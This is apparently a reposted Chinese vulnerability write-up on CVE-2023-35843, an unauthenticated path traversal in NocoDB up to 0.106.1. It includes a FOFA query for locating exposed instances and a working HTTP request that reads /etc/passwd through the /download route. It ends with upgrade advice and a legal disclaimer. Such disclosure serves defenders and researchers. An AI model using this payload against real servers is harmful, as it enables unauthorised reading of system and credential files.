漏洞简介
NocoDB是一个免费的开源工具,可以在任何数据库上创建智能电子表格和 REST APIs。NocoDB 的工作原理是连接到任何关系数据库并将它们转换为智能电子表格界面。NocoDB目前适用于MySQL、PostgreSQL、Microsoft、SQLServer、SQLite、Amazon Aurora 和 MariaDB 数据库。
NocoDB存在路径遍历漏洞,未经身份验证的攻击者可以通过操纵/download路由的路径参数来访问服务器上的任意文件。此漏洞允许攻击者访问服务器上的敏感文件和数据,包括配置文件、源代码和其他敏感信息。
影响版本
NocoDB<=0.106.1
FOFA语句
"NocoDB"
漏洞复现
burp抓包,替换以下payload
GET /download/..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1
Host: *
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: *
Connection: close
修复建议
1.建议升级至最新版本
2.限制目录访问
参考链接
http://mp.weixin.qq.com/s?__biz=MzkyMjE3MjEyNQ==&mid=2247486245&idx=1&sn=bf64e590fd808da0e55729e8bf4a3115&chksm=c1f92497f68ead81de34224eb4ac591e95893372780a5231bb7fc757905d9f8bd0447d229776#rd
本文版权归作者和微信公众号平台共有,重在学习交流,不以任何盈利为目的,欢迎转载。
由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,文章作者不为此承担任何责任。公众号内容中部分攻防技巧等只允许在目标授权的情况下进行使用,大部分文章来自各大安全社区,个人博客,如有侵权请立即联系公众号进行删除。若不同意以上警告信息请立即退出浏览!!!
敲敲小黑板:《刑法》第二百八十五条 【非法侵入计算机信息系统罪;非法获取计算机信息系统数据、非法控制计算机信息系统罪】违反国家规定,侵入国家事务、国防建设、尖端科学技术领域的计算机信息系统的,处三年以下有期徒刑或者拘役。违反国家规定,侵入前款规定以外的计算机信息系统或者采用其他技术手段,获取该计算机信息系统中存储、处理或者传输的数据,或者对该计算机信息系统实施非法控制,情节严重的,处三年以下有期徒刑或者拘役,并处或者单处罚金;情节特别严重的,处三年以上七年以下有期徒刑,并处罚金。
原文始发于微信公众号(巢安实验室):CVE-2023-35843—NocoDB 任意文件读取漏洞
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论